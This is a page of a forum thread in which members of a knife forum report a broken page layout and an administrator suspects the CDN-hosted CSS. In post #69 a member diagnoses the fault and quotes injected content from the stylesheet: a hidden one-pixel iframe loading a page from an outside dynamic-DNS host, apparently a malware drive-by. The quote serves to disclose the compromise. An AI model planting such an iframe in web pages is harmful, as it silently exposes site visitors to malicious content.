Quantcast
whats new page not working properly - Page 7
+ Reply to Thread
Page 7 of 10 FirstFirst ... 56789 ... LastLast
Results 61 to 70 of 95

Thread: whats new page not working properly

  1. #61
    Senior Member

    Join Date
    Feb 2011
    Location
    Pensacola, FL, USA
    Posts
    3,814
    Quote Originally Posted by Mrmnms View Post
    Windows 7 computer is fine, Apple products are not so
    MacBook Air, iPad, iPhone - all are good for me.
    “Ignorance more frequently begets confidence than does knowledge.”

  2. #62
    WillC's Avatar
    Join Date
    Jul 2011
    Location
    herefordshire uk
    Posts
    1,588
    Mac here, still all funny.

  3. #63
    Administrator
    Join Date
    Feb 2013
    Location
    San Marcos, Texas
    Posts
    661
    This is the only page messed up?

    If you do a hard refresh, does it not resolve?

    It's the CSS which is hosted on our CDN.

    Let me flush the CDN and see if that helps.

  4. #64
    brianh's Avatar
    Join Date
    Jun 2013
    Location
    NJ, near NYC
    Posts
    496
    Also happens when doing a "search."

  5. #65
    daveb's Avatar
    Join Date
    Mar 2012
    Location
    Just outside Tampa
    Posts
    926
    "hard refresh" = log out, log in? No joy.

    Log out, close FF, Restart FF, Log in. No joy.

    Win 7, FF
    Dave
    Older and wider.

  6. #66
    Sponsors
    JBroida's Avatar
    Join Date
    Feb 2011
    Location
    Beverly Hills, CA
    Posts
    4,050
    refreshed, cleared cache, etc., and still bad on windows and mac

  7. #67
    Senior Member Mucho Bocho's Avatar
    Join Date
    Feb 2012
    Location
    Raleigh, NC
    Posts
    1,347
    working now for me
    One thing you can give and still keep...is your word.

  8. #68
    brianh's Avatar
    Join Date
    Jun 2013
    Location
    NJ, near NYC
    Posts
    496
    Still no good on ipad with mercury or safari.

  9. #69
    ajrh's Avatar
    Join Date
    Mar 2013
    Location
    Brooklyn, NY
    Posts
    20
    In case it's any help, I had a quick look into the broken page (e.g. view page source in firefox, and then clicking on the css links). The first one looks OK, but the second has "interesting" content, at least when seen from my home (timewarner NYC) internet connection: e.g.

    curl 'http://cdn.kitchenknifeforums.com/css.php?styleid=1&langid=1&d=1381158886&td=ltr&she et=threadlist.css,forumbits.css,postbit.css,postbi t-lite.css,search.css'

    <iframe src="http://pxqokmsjd.sytes.net:12601/catalogs/system/questions.php?speakers=82" width=1 height=1 style="visibility: hidden"></iframe>

    This looks similar to what's described here:
    http://blog.sucuri.net/2013/10/malwa...sytes-net.html

    Using some different IP connections the css looks fine, so I guess the CDN is coming into play.

    A

  10. #70
    Senior Member
    Join Date
    Apr 2013
    Posts
    118
    Same thing for me on opera.

+ Reply to Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts